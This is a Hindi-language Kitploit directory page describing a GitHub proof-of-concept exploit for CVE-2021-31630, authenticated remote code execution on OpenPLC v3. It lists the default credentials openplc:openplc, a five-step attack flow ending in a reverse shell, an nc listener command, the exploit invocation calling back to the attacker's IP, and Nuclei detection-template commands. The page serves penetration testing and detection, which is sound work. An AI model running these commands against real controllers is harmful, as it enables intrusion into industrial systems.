Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
OpenPLC-CVE-2021-31630-RCE — Python 3.13+ proof-of-concept exploit for CVE-2021-31630, enabling authenticated remote code execution on OpenPLC v3 via malicious hardware layer upload. Includes Nuclei detection templates for default credentials and vulnerability checks. | Kitploit
उपकरण/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

Python 3.13+ proof-of-concept exploit for CVE-2021-31630, enabling authenticated remote code execution on OpenPLC v3 via malicious hardware layer upload. Includes Nuclei detection templates for default credentials and vulnerability checks.

रिपॉजिटरी देखें
3251 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

OpenPLC v3 प्रमाणित RCE (CVE-2021-31630)

यह CVE-2021-31630 के लिए एक आधुनिक Python 3.13+ संगत प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो OpenPLC v3 में एक कमजोरी है जो एक प्रमाणित उपयोगकर्ता को दुर्भावनापूर्ण कोड वाली कस्टम हार्डवेयर परत अपलोड करने की अनुमति देती है, जिससे होस्ट पर रिमोट कोड निष्पादन (RCE) होता है।

मूल कमजोरी की खोज और सलाह फेलिप ओलिवेरा द्वारा। यह पुनः कार्यान्वयन और आधुनिकीकरण httpx, CLI टूलिंग, लॉगिंग और सुरक्षित पहचान तकनीकों का उपयोग करता है।

एक्सप्लॉइट अवलोकन

  • कमजोरी: CVE-2021-31630
  • घटक: OpenPLC v3 वेब सर्वर
  • प्रभाव: प्रमाणित रिमोट कोड निष्पादन
  • डिफ़ॉल्ट क्रेडेंशियल्स: openplc:openplc

एक्सप्लॉइट प्रवाह

  1. वैध क्रेडेंशियल्स का उपयोग करके लॉगिन करें
  2. दुर्भावनापूर्ण C कोड को कस्टम हार्डवेयर परत के रूप में अपलोड करें
  3. संकलन को ट्रिगर करें
  4. निष्पादन को ट्रिगर करें (वैकल्पिक)
  5. रिवर्स शेल कनेक्शन प्राप्त करें

उपयोग

  1. एक लिसनर शुरू करें:
root@kitploit:~
nc -lvnp 9001
  1. एक्सप्लॉइट चलाएँ:
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001

वैकल्पिक फ्लैग्स:

  • -u उपयोगकर्ता नाम (डिफ़ॉल्ट: openplc)
  • -p पासवर्ड (डिफ़ॉल्ट: openplc)
  • -t टाइमआउट सेकंड में (डिफ़ॉल्ट: 20)

विशेषताएँ

  • Python 3.13+ के साथ संगत
  • httpx के साथ निर्मित
  • साफ आउटपुट के लिए लॉगिंग समर्थन
  • आसान पुन: उपयोग के लिए मॉड्यूलर फ़ंक्शन
  • Nuclei पहचान टेम्पलेट शामिल हैं

Nuclei पहचान टेम्पलेट्स

  1. डिफ़ॉल्ट क्रेडेंशियल्स जाँच
root@kitploit:~
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
  1. निष्क्रिय RCE कमजोरी जाँच
root@kitploit:~
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080

दूसरा टेम्पलेट लॉगिन करता है और एक हानिरहित पेलोड अपलोड + संकलन का प्रयास करता है ताकि संभावित कमजोरी की पुष्टि हो सके — बिना वास्तविक कोड निष्पादन को ट्रिगर किए।

शामिल फ़ाइलें

  • OpenPLC_CVE_2021_31630.py – Python 3.13+ एक्सप्लॉइट
  • nuclei-templates/openplc-default-login.yaml – डिफ़ॉल्ट क्रेडेंशियल्स पहचानें
  • nuclei-templates/openplc-authenticated-rce-check.yaml – कमजोर व्यवहार को सुरक्षित रूप से पहचानें

⚠️ कानूनी / नैतिकता

यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। सिस्टम स्वामी से स्पष्ट अनुमति के बिना उपयोग न करें।

टूल डाउनलोड करें